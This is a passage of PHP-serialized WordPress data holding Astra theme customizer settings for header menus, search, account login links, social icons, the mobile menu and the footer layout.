center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[header-menu2-h-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:25:"var(--ast-global-color-1)";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[header-menu2-h-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[header-menu2-a-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:25:"var(--ast-global-color-1)";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:50:"astra-settings[header-menu2-a-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[header-2-font-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[header-menu2-header-menu-typography]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-menu2-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:40:"astra-settings[header-menu2-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:38:"astra-settings[header-menu2-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-menu2-font-extras]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-2-spacing-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-menu2-menu-spacing]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:38:"section-header-search-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-search-icon-color]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-search-icon-space]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:18;s:6:"tablet";i:18;s:6:"mobile";i:18;}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-header-search-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[section-header-search-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:59:"astra-settings[section-header-search-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[header-account-tabs]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[header-account-login-heading]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-account-login-style]";a:4:{s:7:"default";s:4:"icon";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-account-logged-in-text]";a:4:{s:7:"default";s:10:"My Account";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-account-login-link]";a:4:{s:7:"default";a:3:{s:3:"url";s:0:"";s:7:"new_tab";b:0;s:8:"link_rel";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:13:"sanitize_link";}}s:45:"astra-settings[header-account-logout-heading]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[header-account-logout-style]";a:4:{s:7:"default";s:4:"icon";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-account-logout-preview]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[header-account-logged-out-text]";a:4:{s:7:"default";s:6:"Log In";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-account-logout-link]";a:4:{s:7:"default";a:3:{s:3:"url";s:42:"https://www.happythinking.com/wp-login.php";s:7:"new_tab";b:0;s:8:"link_rel";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:13:"sanitize_link";}}s:42:"astra-settings[header-account-image-width]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:2:"40";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-account-icon-size]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:18;s:6:"tablet";i:18;s:6:"mobile";i:18;}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-account-icon-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:50:"astra-settings[header-account-text-design-options]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[header-account-type-text-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:46:"astra-settings[header-account-spacing-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[header-account-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:48:"astra-settings[font-size-section-header-account]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:60:"astra-settings[section-header-account-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:63:"astra-settings[section-hb-social-icons-1-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[font-size-section-hb-social-icons-1]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"section-hb-social-icons-1-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-social-1-color-type]";a:4:{s:7:"default";s:6:"custom";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[header-social-1-icon-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[header-social-1-label-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[header-social-1-background-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[header-social-1-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[header-social-1-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[header-social-1-label-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-social-1-label-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-social-1-bg-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[header-social-1-bg-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[header-social-icons-1]";a:4:{s:7:"default";a:1:{s:5:"items";a:3:{i:0;a:8:{s:2:"id";s:8:"facebook";s:7:"enabled";b:1;s:6:"source";s:4:"icon";s:3:"url";s:0:"";s:5:"color";s:7:"#557dbc";s:10:"background";s:11:"transparent";s:4:"icon";s:8:"facebook";s:5:"label";s:8:"Facebook";}i:1;a:8:{s:2:"id";s:7:"twitter";s:7:"enabled";b:1;s:6:"source";s:4:"icon";s:3:"url";s:0:"";s:5:"color";s:7:"#7acdee";s:10:"background";s:11:"transparent";s:4:"icon";s:7:"twitter";s:5:"label";s:7:"Twitter";}i:2;a:8:{s:2:"id";s:9:"instagram";s:7:"enabled";b:1;s:6:"source";s:4:"icon";s:3:"url";s:0:"";s:5:"color";s:7:"#8a3ab9";s:10:"background";s:11:"transparent";s:4:"icon";s:9:"instagram";s:5:"label";s:9:"Instagram";}}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[header-social-1-label-toggle]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[header-social-1-space]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[header-social-1-bg-space]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[header-social-1-size]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:18;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[header-social-1-radius-fields]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:56:"astra-settings[section-hb-social-icons-1-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[section-hb-social-icons-1-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:43:"section-header-mobile-menu-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[header-mobile-menu-create-menu-link]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[header-mobile-menu-submenu-item-border]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[header-mobile-menu-divider-colors-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[header-mobile-menu-submenu-item-b-size]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:55:"astra-settings[header-mobile-menu-submenu-item-b-color]";a:4:{s:7:"default";s:7:"#eaeaea";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:46:"astra-settings[header-mobile-menu-link-colors]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[header-mobile-menu-background-colors]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[header-mobile-menu-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:25:"var(--ast-global-color-3)";s:6:"tablet";s:25:"var(--ast-global-color-3)";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[header-mobile-menu-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:25:"var(--ast-global-color-5)";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[header-mobile-menu-h-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:25:"var(--ast-global-color-1)";s:6:"tablet";s:25:"var(--ast-global-color-1)";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[header-mobile-menu-h-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:25:"var(--ast-global-color-4)";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[header-mobile-menu-a-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:25:"var(--ast-global-color-1)";s:6:"tablet";s:25:"var(--ast-global-color-1)";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:56:"astra-settings[header-mobile-menu-a-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:25:"var(--ast-global-color-4)";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[header-mobile-menu-header-typo-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[header-mobile-menu-header-menu-typography]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[header-mobile-menu-font-family]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:19:"sanitize_text_field";}s:46:"astra-settings[header-mobile-menu-font-weight]";a:4:{s:7:"default";s:7:"inherit";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_font_weight";}}s:44:"astra-settings[header-mobile-menu-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[font-extras-header-mobile-menu]";a:4:{s:7:"default";a:6:{s:11:"line-height";s:0:"";s:16:"line-height-unit";s:2:"em";s:14:"letter-spacing";s:0:"";s:19:"letter-spacing-unit";s:2:"px";s:14:"text-transform";s:0:"";s:15:"text-decoration";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:55:"astra-settings[header-mobile-menu-menu-spacing-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[header-mobile-menu-menu-spacing]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:49:"astra-settings[section-header-mobile-menu-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:64:"astra-settings[section-header-mobile-menu-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:45:"section-above-footer-builder-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hba-footer-column]";a:4:{s:7:"default";s:1:"2";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hba-footer-layout]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:7:"2-equal";s:6:"tablet";s:7:"2-equal";s:6:"mobile";s:4:"full";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[hba-footer-layout-width]";a:4:{s:7:"default";s:7:"content";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hba-footer-height]";a:4:{s:7:"default";i:60;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[hba-footer-vertical-alignment]";a:4:{s:7:"default";s:10:"flex-start";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:25:"astra-settings[hba-stack]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:5:"stack";s:6:"tablet";s:5:"stack";s:6:"mobile";s:5:"stack";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[hba-footer-separator]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[hba-footer-top-border-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:44:"astra-settings[hba-footer-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:7:"#eeeeee";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center 